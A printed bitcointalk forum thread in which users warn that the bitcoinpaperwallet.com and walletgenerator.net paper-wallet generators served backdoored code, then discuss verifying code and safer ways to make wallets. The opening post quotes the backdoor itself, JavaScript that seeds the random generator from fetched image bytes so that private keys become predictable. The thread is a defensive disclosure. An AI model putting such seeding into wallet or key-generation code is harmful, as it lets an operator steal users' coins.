Print Page - Vulnerability discovered on bitcoinpaperwallet[.]com

In brief:

- Being open-source, code on GitHub, runs offline, does not mean that you are safe.
- If you have not read every line in Khaled, and the code on the site matches Khaled, then you are not safe.
- Ensure that code being served via the URL match the code on GitHub.
- Don’t trust, Verify.

Warning: bitcoinpaperwallet[Dot]com/walletgenerator[Dot]net have a backdoor that leaves you at risk of your funds being stolen.

there have been changes in the code being served via the bitcoinpaperwallet[.]com did not match the code on GitHub and thus duplicate keypairs being provided to users(potentially making the keys generated non-random or producible.)

Quote from: https://medium.com/mycrypto/disclosure-key-generation-vulnerability-found-on-walletgenerator-net-potentially-malicious-3d8936485961

When generating a key, you take a super-random number, turn it into the private key, and turn that into the public key / address. However, if the “super-random” number is always “5,” the private key that is generated will always be the same. This is why it’s so important that the super-random number is actually random…not “5.”

Code:

  var base64 = "data:image/png;base64," + btoa([].reduce.call(new Uint8Array(this.response),function(p,c){return p+String.fromCharCode(c)},''));
                for(var i = 0; i < base64.length; i++)
                {
                    if(i+3 < base64.length)
                    {
                        if(base64.charCodeAt(i) != 0 && base64.charCodeAt(i+1) != 0 && base64.charCodeAt(i+2) != 0 && base64.charCodeAt(i) != 1 && base64.charCodeAt(i+1) != 1 && base64.charCodeAt(i+2) != 1)
                        {
                            SecureRandom.seedInt((base64.charCodeAt(i) * base64.charCodeAt(i+1) * base64.charCodeAt(i+2))*(i+1));
                        }
                    }
                }
                SecureRandom.loaded = 1;
            };

Source ----> https://bitcointalk.org/index.php?topic=5247201.msg54444963#msg54444963

Read more ----> https://twitter.com/MyCrypto/status/1261830475003252736

Browser-based software is inherently less safe, because each time you open the site is like installing a program anew. This can make it harder to audit, because a server can selectively serve malicious code.

Quote from: hugeblack on May 17, 2020, 01:59:58 PM

In brief:

- Being open-source, code on GitHub, runs offline, does not mean that you are safe.

This is why it's important to use open source software that has the most users, it increases chances of catching malicious modifications early. When Core or Electrum releases new version, there's hundreds of independent users who check the changes and have enough skill and familiarity with the codebase to do so.

Quote from: OcTradism on May 17, 2020, 02:14:09 PM

Nice finding but I still don't catch the reason why people easily accept wallet generator from third-party while they can do that with Bitcoin Core or Electrum (creating wallet offline).

Not everyone can afford to run bitcoin core and isn't Electrum, in one way or another, a third-party software!
You are missing the point here which is "don't trust, verify".
It doesn't matter whether you use it online or offline if you do not verify its code and know how things work under the hood.

Quote from: OcTradism on May 17, 2020, 02:14:09 PM

Nice finding but I still don't catch the reason why people easily accept wallet generator from third-party while they can do that with Bitcoin Core or Electrum (creating wallet offline). After that, print or write private keys or mnemonic seeds on paper. It is safer and not too hard to do.

I can think of two logical reasons:

- They believe that it is the same as Bitcoin Core or Electrum security because it is open source and addresses can be generated offline.
- Attractive and elegant designs that are suitable for gifts, and are easy to print.

Quote from: hatshepsut93 on May 17, 2020, 02:24:55 PM

there's hundreds of independent users who check the changes and have enough skill and familiarity with the codebase to do so.

I agree with you, the relative security that many users feel that the wallet is open source or running it offline makes them trust them without reviewing the code.
Unfortunately, the random generation function can produce predictable private keys.

BTW: Here's a python code that generates such predictable addresses:

Code:

#!/usr/bin/env python3
# [repo]    github.com/brianddk/reddit/blob/master/python/bad_address.py
# [req]     pip3 install pycoin mnemonic

from mnemonic import Mnemonic
from pycoin.symbols.btc import network as btc

code = ("abandon abandon abandon abandon abandon abandon" + 
        " abandon abandon abandon abandon abandon about")
path = '44H/0H/0H/0/0'
mnemo = Mnemonic("english")

one_privkey = btc.parse.secret_exponent(1).address()
zero_hash   = btc.address.for_p2pkh(bytes([0]*20))
zero_bip39  = btc.keys.bip32_seed(mnemo.to_seed(code)
                ).subkey_for_path(path).address()

print(one_privkey, zero_bip39, zero_hash)

Quote from: btc_angela on May 17, 2020, 10:24:14 PM

This is not new I supposed, because it was reported last year already:

The above article talks about bitcoinpaperwallet[.]com and not WalletGeneratorDOTnet, although I think both sites are run by the same scammer.

Quote from: Chivas Regal on May 18, 2020, 01:23:44 AM

Hopefully they are the exception to the rule?

I have been using https://segwitaddress.org/ for newer "number three" wallet addresses and before that https://www.bitaddress.org/ for the older 'number one" addresses. I can't recall hearing that they are also infected - can anyone confirm they are ok?

It seems like both of those are safe for now, as I couldn't find any legitimate scam accusations. Considering this is an incredibly high stake scenario though, when in doubt, it's best to simply go for the more reputable options. As others have pointed out, Bitcoin Core and Electrum are popular, and therefore more scrutinized, making them safer to trust for people who can't review code by themselves.

Quote from: Chivas Regal on May 18, 2020, 01:23:44 AM

you should always do these yourself and only trust your own judgement. to learn how to do it you have to go to the corresponding github repository and download the source code from there. one indication of whether it is changed or not is the last commit date. for example for https://github.com/pointbiz/bitaddress.org it is Dec 24, 2016 which is a good indication that the code is the same as it was 4 years ago.

i would also suggest using a trusted desktop wallet to generate a paper wallet though.

Quote from: hugeblack on May 18, 2020, 01:11:53 AM

Quote from: btc_angela on May 17, 2020, 10:24:14 PM

This is not new I supposed, because it was reported last year already:

The above article talks about bitcoinpaperwallet[.]com and not WalletGeneratorDOTnet, although I think both sites are run by the same scammer.

The link you gave above is the same link that is included on that thread that I've posted.

You can check it yourself, that's why I said that this is nothing new and have been exposed about the same time last year, May 2019.

But I have to agree that probably the same bad actor are behind this websites.

Just want to bump this thread, it's already 2021 but the website is up and still scamming bitcoin enthusiast. And according to this reddit post, help me shut down the bitcoinpaperwallet.com scam (https://www.reddit.com/r/Bitcoin/comments/ktydef/help_me_shut_down_the_bitcoinpaperwalletcom_scam/).

I have submitted the report already, it's about time that the community work together again to put a stop to the people behind this project.

Quote from: TravelMug on January 10, 2021, 12:29:10 AM

Has the DOGE coin paper wallet site been affected too?

https://bitcoinpaperwallet [dot] com/dogecoin-paper-wallet-generator/

When was the original modification (scam) of the bitcoin paper wallet website made?

Quote from: Chivas Regal on May 04, 2021, 09:20:50 AM

AFAIK, 7 Years ago, project was open source and giving paper wallet using open source code.
at some point from 2018 to 2019 project tern into scam and changing code from real open source one to other scam one.
you can read more about this story from google. site now is scam and using that special domain name to earn more.

Quote from: Chivas Regal on May 04, 2021, 09:20:50 AM

Has the DOGE coin paper wallet site been affected too?
https://bitcoinpaperwallet [dot] com/dogecoin-paper-wallet-generator/
When was the original modification (scam) of the bitcoin paper wallet website made?

You don't need a website or a specialized tool to create a paper wallet because there is nothing special about a paper wallet. It is simply a private key written on a piece of paper. You can just download the main client of the coin you want to create the paper wallet for (in this case Dogecoin core for Dogecoin) and create a new wallet and export one of its private keys with the corresponding address and write that down on a piece of paper.

Quote from: pooya87 on May 06, 2021, 03:59:26 AM

You misunderstand my question my friend, I am asking because many years ago I'd done some trades on an exchange for DOGE for a good price and figured I'd either buy the coins back later for a lower price or cash them in for bitcoins. I did neither and a little while later I heard the exchange was in trouble (they ended up folding) so I made a couple of paper wallets (because in those days I couldn't afford the storage to download the bitcoin, dogecoin and some other coin's block-chains) and that's where this website comes in as it was the one I used to create the DOGE coin paper wallets. I'm wondering when they went rogue in case it was before or after my paper wallets were created.

Quote from: hugeblack on May 05, 2021, 08:18:34 PM

If that's the case, then my coins are safe as I'd created the paper wallets more than a year earlier than that time frame. Thanks.

Quote from: Chivas Regal on May 07, 2021, 10:42:18 PM

I'm wondering when they went rogue in case it was before or after my paper wallets were created.

The malicious site would have created a key that is known by the owner of the website and any coins that you had sent to that address would have been stolen by the time it was created. So if they are untouched until today, there is a good chance that they are safe; however, I wouldn't take any risks if I were you, I'd simply create a new paper wallet the "correct way" and move the coins to the new one.

Users should avoid any service to generate wallets online. There is always a risk, even if the site inst vulned the key could get hacked with spoofing or a Man in middle attack. That's why I always recommend to the users to generate their address with the software on their machines, a good tool for this task is vanity gen. If we use it on a virtual machine without an internet connection we can be safe while creating our addresses.

Never use a paper wallet online service, that's a big mistake and people who do it are risking their coins.

Quote from: bitcoinVPSD on May 08, 2021, 10:19:38 PM

I have no knowledge of Bitcoin technology, so for safety I think I need to be answered. Is it safe to use open sources to create another site? For example Vanity Search or the like to customize your address. I see some people providing instructions on how to do it, is it really safe? Is the open source you mentioned like Vanity Search?